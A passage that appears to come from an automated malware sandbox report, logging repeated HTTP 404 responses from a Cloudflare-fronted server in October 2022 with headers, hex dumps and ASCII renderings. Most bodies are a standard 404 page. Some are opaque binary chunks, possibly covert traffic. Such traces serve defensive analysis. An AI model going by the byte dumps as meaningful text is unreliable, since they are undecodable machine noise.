e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 f2 8b 8b e1 72 5b d7 9c c4 c3 e0 2b 9d bf bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 Data Ascii: 7d6c`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2Y>+([;S#0T[l2`ma *ikZz|fa4wp673P#p"XJ3Ob>!ZC:>YuSSQ*{~xJ$Oa~i~]DzN,z!Qa6<5|(kJk?a]V4l3l
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2j%2BG0TuBeEb%2B718l4IcNHqvsmb5%2FURQTJ2nlKZ%2BrZIAdPO59uvg1H%2BpCEnm9OYqyqPP8zwBWiwAu8zUiZ33Vjes1yVUcLLfR8ICZuLcJDKHOVKmpZaTP3nUUAf8b3nzzKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b5894a06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FnEqIOUVgHkCA6dmPTX8MQA57DvXbCBz%2FkdAkHQGY31oDK%2FwrF38ZS4sSOWnaTH7aezykVmTzii76QS1MbfhqeAg7aj4VO2m%2FGG%2BXBc3fetrR%2BqU%2F2lkC8XPQqhokkbEWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b64a9c06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qv76Zyv3DXqgduqpOT%2Fap6kb0AyM2NyxeEgH7VsxPdEZTPxUekzEzzcATGgBWTP%2FisMnu7pADkRp3bs8HC6Aw2d9m3TDB3endIm4DUQGiJGlz2bmhrK6pYVP2hK6BL3llg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b72c0e06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5zlqtk%2F8xb1LLitUYEq85Pm83C0wQVr8uiIbjT6o%2BKE74AFyy3v5p9p7o5%2BVY9Gg0Kegac6YXfDb7n9q0lWHzholuQ%2FbC7cBYX4zn8%2BYv0Wq%2BUh%2FYvXasQsRzx0h2Hwpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b7ed3706d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a2 4e f2 7a a6 64 14 0e 63 bf 75 4a 61 94 5d 0d 0a Data Ascii: 28Uys/~(`:LDNzdcuJa]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s1v%2Bgx4MDe2nngZ9vJhRTJWiek%2BpWKZYyxOm0WJRASi81rbou8GGd%2F%2FeG26tujefQqKwWTxHJaHKHDha6hV1wZ4kH%2FgrGuq4WbkiHZJnCWTbb8WYeo1y3RI7b3EakRPZFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7c00a9a06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MH4T%2FMqff3N4OrHnnRMlaneafNnafTKCK3Vq2FjF2qz8fObhvZWeTjJTFrlpRqN31PS4KGh4yZIFW66%2FeexijRGYNTk8quehV%2F2jp1MVRy%2Bp4C6R2YVFzPcklcB5Kf12EQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7c439d906d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B34UVpqEQHKdsJgz9n2w%2FdDIj9mLcQhOn%2FWU9b8g3v8kE4PrQyGsCvL2kSD0gcLFVt2yH%2B9fzTkKoVPpyQ%2BqEhnggeuiw4PcSbsSJ3whOwsqss%2BejPa%2FDoThyuMxZ44Jsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7c71f1f06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=65wTixgQCVrdomjCkVKJ7TSMtzbH4CsUGEvFxgg1qB7oZlfR9TRjZFOJc2vP9np%2FMEj35fyeNLOtl3%2BDJr4r0wpKzaovSk9ABB3TZ56N3sxjSIhQbHYJZ5pVYhljLcgM4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e1997606d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yiHLB0muGZOWOS1UV%2FZ6%2FxBSP4kFNUgzgmMPY39sAPx9z06Lh5JuDfHt8%2BH1sbkZVBeIKcBujy5Fs%2FWgtJdkr9xK0Igud8Anyw%2BoJ0pr9fs1Kq0VUydzwS7JmIEv55ID4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e27ad706d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 00 59 3e b0 19 c6 28 d9 b5 96 d3 15 69 05 0f d6 f2 97 ac f7 97 3b e2 df 61 23 30 54 2d f5 09 16 69 6c 32 60 e0 dd 6d 61 12 2a 85 19 5e f7 6b db 89 b2 07 5a b1 a4 07 0d ab 17 c4 f8 48 7c e1 66 90 cc f8 83 53 34 77 70 36 f8 37 33 62 97 23 f5 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a ac 6a 09 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d f9 53 2b e5 d3 94 7b 7e 45 f7 ff 7e 2c 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d d0 57 19 e0 28 95 a9 38 14 f1 96 bc 25 51 e0 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 6e 9f 32 6c 01 7c 0a 8d c7 0d fc 0e 7c a0 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 9f 08 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 21 ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 ad df 13 51 8c 60 17 4b 81 9b de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e e6 9e 07 ee c3 ce 55 a3 4c 37 84 1f d4 a8 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a 15 af 7f 74 79 a0 75 43 cc f5 8b 8b e1 7c 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*Y>(i;a#0T-il2`ma*^kZH|fS4wp673b#p"XJcb>Y Zj[V?#B7PRS+{~E~,U$a|l~_DzW(8%Q.|8HkJ{/a]F4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJJMFUDHfK88ejDb3ssSgFlIiEfC3o%2FsibgdQSJX%2Bj5YP9NLc75w8mjBAVXgyOiGaz5xhN1OBkqQMjxU1YMvnY%2BlcycxsRry5NM3%2BM1b%2B3nAdax6pmmNprEk1hp7Mmd%2F5g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e7fb9506d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aZKHvJvCVDCzxhjWf5J7Z9xbZ3ssVz0tZAOE%2BAhaTk6DEEA82yxzyjC%2BpHWjq0J0nQOyRFRkwLq6FGHh2WrIAX2GwKoR5X8WIXpKW6u5q3U8EWmHbSz46SbVBrXwl6b1Xw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e92d8406d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc d0 33 a4 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 15 3d 33 d1 8c 77 45 7c 1f 57 44 d5 2d 97 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed e5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 af 87 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 15 16 a9 a0 91 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 75 74 bf 76 34 fd f8 92 3d 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb a0 b2 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 33 d4 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 58 94 fc 9d 7f 3f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 